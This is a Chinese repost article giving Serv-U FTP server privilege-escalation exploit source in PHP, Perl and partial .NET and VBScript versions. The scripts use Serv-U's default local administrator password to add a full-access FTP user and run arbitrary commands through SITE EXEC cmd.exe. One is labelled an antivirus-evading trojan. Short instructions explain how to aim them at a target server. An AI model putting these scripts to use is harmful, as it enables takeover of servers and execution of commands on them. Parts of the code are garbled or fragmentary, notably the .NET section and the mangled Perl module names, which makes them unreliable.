C.net/Perl/PHP 三个版本的 ServU提权源码程序

“南音”通过精心收集，向本站投稿了2篇C.net/Perl/PHP 三个版本的 ServU提权源码程序，下面是小编为大家带来的C.net/Perl/PHP 三个版本的 ServU提权源码程序，希望大家能够喜欢!

篇1：.NET/Perl/PHP 三个版本的 ServU提权源码程序

1..NET版本Serv-U提权程序

<%@ Page Language=“VB” Debug=“true” %>

<%@ import Namespace=“System.Net.Sockets” %>

from Serv-U 2

admin by lake2

Name

LocalAdministrator

PWD

#l@$ak#.lk;0@P

Port

43958

cmd

2.PHP版sevru提权木马

/**

注释免杀版本

**/

//

//Codez begin

//

//判断magic_quotes_gpc的值

if (get_magic_quotes_gpc) {

$_GET = stripslashes_array($_GET);

}

//变量初始化

$addr = ’0.0.0.0’;

$ftpport = 21;

$adminport = 43958;

$adminuser = ’LocalAdministrator’;

$adminpass = ’#l@$ak#.lk;0@P’;

$user = ’wofeiwo’;

$password = ’wrsky’;

$homedir = ’C:\\’;

$dir = ’C:\\WINNT\\System32\\’;

//有改变则赋值

if ($_GET){

$addr = $_GET[’addr’] ;

$ftpport = $_GET[’ftpport’] ;

$adminport = $_GET[’adminport’] ;

$adminuser = $_GET[’adminuser’] ;

$adminpass = $_GET[’adminpass’] ;

$user = $_GET[’user’] ;

$password = $_GET[’password’] ;

$homedir = $_GET[’homedir’] ;

if ($_GET[’dir’]){

$dir = $_GET[’dir’] ;

}

}

?>

-==-

Serv-U All Version本地提升权限Exp10it Ver 1.5

添加Serv-U用户部分

主机IP：

主机Ftp端口：

主机Ftp管理端口：

主机Ftp管理用户：

主机Ftp管理密码：

添加的用户名：

添加的用户名密码：

用户主目录(别忘了写“\”)：

命令回显:

//添加用户

if ($_GET[’action’]==“up”){

up($addr,$ftpport,$adminport,$adminuser,$adminpass,$user,$password,$homedir);

}

?>

执行命令部分

主机Ftp端口：

用户名：

用户名密码：

系统路径(别忘了写“\”)：

执行的命令：

命令回显:

//执行命令

if ($_GET[’action’]==“execute”){

ftpcmd($ftpport,$user,$password,$dir,$_GET[’cmd’]);

}

?>

Copycenter (C) 我非我 All centers Reserved.

//添加用户主函数定义

function up($addr,$ftpport,$adminport,$adminuser,$adminpass,$user,$password,$homedir){

$fp = fsockopen (“127.0.0.1”, $adminport, $errno, $errstr, 8);

if (!$fp) {

echo “$errstr ($errno)

\n”;

} else {

fputs ($fp, “USER ”.$adminuser.“\r\n”);

sleep (1);

fputs ($fp, “PASS ”.$adminpass.“\r\n”);

sleep (1);

fputs ($fp, “SITE MAINTENANCE\r\n”);

sleep (1);

fputs ($fp, “-SETUSERSETUP\r\n”);

fputs ($fp, “-IP=”.$addr.“\r\n”);

fputs ($fp, “-PortNo=”.$ftpport.“\r\n”);

fputs ($fp, “-User=”.$user.“\r\n”);

fputs ($fp, “-Password=”.$password.“\r\n”);

fputs ($fp, “-HomeDir=”.$homedir.“\r\n”);

fputs ($fp, “-LoginMesFile=\r\n”);

fputs ($fp, “-Disable=0\r\n”);

fputs ($fp, “-RelPaths=0\r\n”);

fputs ($fp, “-NeedSecure=0\r\n”);

fputs ($fp, “-HideHidden=0\r\n”);

fputs ($fp, “-AlwaysAllowLogin=0\r\n”);

fputs ($fp, “-ChangePassword=1\r\n”);

fputs ($fp, “-QuotaEnable=0\r\n”);

fputs ($fp, “-MaxUsersLoginPerIP=-1\r\n”);

fputs ($fp, “-SpeedLimitUp=-1\r\n”);

fputs ($fp, “-SpeedLimitDown=-1\r\n”);

fputs ($fp, “-MaxNrUsers=-1\r\n”);

fputs ($fp, “-IdleTimeOut=600\r\n”);

fputs ($fp, “-SessionTimeOut=-1\r\n”);

fputs ($fp, “-Expire=0\r\n”);

fputs ($fp, “-RatioUp=1\r\n”);

fputs ($fp, “-RatioDown=1\r\n”);

fputs ($fp, “-RatiosCredit=0\r\n”);

fputs ($fp, “-QuotaCurrent=0\r\n”);

fputs ($fp, “-QuotaMaximum=0\r\n”);

fputs ($fp, “-Maintenance=System\r\n”);

fputs ($fp, “-PasswordType=Regular\r\n”);

fputs ($fp, “-Ratios=None\r\n”);

fputs ($fp, “ Access=”.$homedir.“|RWAMELCDP\r\n”);

fputs ($fp, “QUIT\r\n”);

sleep (1);

while (!feof($fp)) {

echo fgets ($fp,128);

}

}

}

//执行命令主函数定义

function ftpcmd($ftpport,$user,$password,$dir,$cmd){

$conn_id = fsockopen (“127.0.0.1”, $ftpport, $errno, $errstr, 8);

if (!$conn_id) {

echo “$errstr ($errno)

\n”;

} else {

fputs ($conn_id, “USER ”.$user.“\r\n”);

sleep (1);

fputs ($conn_id, “PASS ”.$password.“\r\n”);

sleep (1);

fputs ($conn_id, “SITE EXEC ”.$dir.“cmd.exe /c ”.$cmd.“\r\n”);

fputs ($conn_id, “QUIT\r\n”);

sleep (1);

while (!feof($conn_id)) {

echo fgets ($conn_id,128);

}

fclose($conn_id);

}

}

//去除转义字符

function stripslashes_array(&$array) {

while (list($key,$var) = each($array)) {

if ($key != ’argc’ && $key != ’argv’ && (strtoupper($key) != $key || ’’.intval($key) == “$key”)) {

if (is_string($var)) {

$array[$key] = stripslashes($var);

}

if (is_array($var)) {

$array[$key] = stripslashes_array($var);

}

}

}

return $array;

}

?>

3.Perl版本的serv-U提权程序

#!/usr/bin/perl

use I:Socket;

binmode(STDOUT);

syswrite(STDOUT, “Content-type: text/html\r\n\r\n”, 27);

$addr = “127.0.0.1”;

$ftpport = 21;

$adminport = 43958;

$adminuser = “LocalAdministrator”;

$adminpass = ’#l@$ak#.lk;0@P’;

$user = “Andyower”;

$password = “haika”;

$homedir = ’C:\\’;

$dir = ’C:\\WINNT\\System32\\’;

use I:Socket::INET;

$sock = I:Socket::INET->new(“127.0.0.1:$adminport”) || die “fail”;

print “Andyower制作

”;

print $sock “USER $adminuser\r\n”;

sleep (1);

print $sock “PASS $adminpass\r\n”;

sleep(1);

print $sock “SITE MAINTENANCE\r\n”;

sleep(1);

print $sock “-SETUSERSETUP\r\n”;

print $sock “-IP=”.$addr.“\r\n”;

print $sock “-PortNo=”.$ftpport.“\r\n”;

print $sock “-User=”.$user.“\r\n”;

print $sock “-Password=”.$password.“\r\n”;

print $sock “-HomeDir=”.$homedir.“\r\n”;

print $sock “-LoginMesFile=\r\n”;

print $sock “-Disable=0\r\n”;

print $sock “-RelPaths=0\r\n”;

print $sock “-NeedSecure=0\r\n”;

print $sock “-HideHidden=0\r\n”;

print $sock “-AlwaysAllowLogin=0\r\n”;

print $sock “-ChangePassword=1\r\n”;

print $sock “-QuotaEnable=0\r\n”;

print $sock “-MaxUsersLoginPerIP=-1\r\n”;

print $sock “-SpeedLimitUp=-1\r\n”;

print $sock “-SpeedLimitDown=-1\r\n”;

print $sock “-MaxNrUsers=-1\r\n”;

print $sock “-IdleTimeOut=600\r\n”;

print $sock “-SessionTimeOut=-1\r\n”;

print $sock “-Expire=0\r\n”;

print $sock “-RatioUp=1\r\n”;

print $sock “-RatioDown=1\r\n”;

print $sock “-RatiosCredit=0\r\n”;

print $sock “-QuotaCurrent=0\r\n”;

print $sock “-QuotaMaximum=0\r\n”;

print $sock “-Maintenance=System\r\n”;

print $sock “-PasswordType=Regular\r\n”;

print $sock “-Ratios=None\r\n”;

print $sock “ Access=”.$homedir.“|RWAMELCDP\r\n”;

print $sock “QUIT\r\n”;

@ret=<$sock>;

print “@ret”;

close(STDERR);

close(STDOUT);

exit;

篇2：SERVU 6.4提权脚本通杀SERVU版本脚本安全

提权的代码如下:

ftpport = 65500

timeout=3

loginuser = “User ” & user & vbCrLf

loginpass = “Pass ” & pass & vbCrLf

deldomain = “-DeleteDOMAIN” & vbCrLf & “-IP=0.0.0.0” & vbCrLf & “ PortNo=” & ftpport & vbCrLf

mt = “SITE MAINTENANCE” & vbCrLf

newdomain = “-SETDOMAIN” & vbCrLf & “-Domain=goldsun|0.0.0.0|” & ftpport & “|-1|1|0” & vbCrLf & “-TZOEnable=0” & vbCrLf & “ TZOKey=” & vbCrLf

newuser = “-SETUSERSETUP” & vbCrLf & “-IP=0.0.0.0” & vbCrLf & “-PortNo=” & ftpport & vbCrLf & “-User=go” & vbCrLf & “-Password=od” & vbCrLf & _

修改ftpport为21

修改newdomain后面的goldsun| IP(为要提权的服务器的IP地址)|

修改newuser后面的 -IP=IP地址和上面一样(为要提权的服务器的IP地址)...OK.....提权...会用FTP增加一个可以

执行命令的用户.....有个这个用户什么不能做

【C.net/Perl/PHP 三个版本的 ServU提权源码程序】相关文章：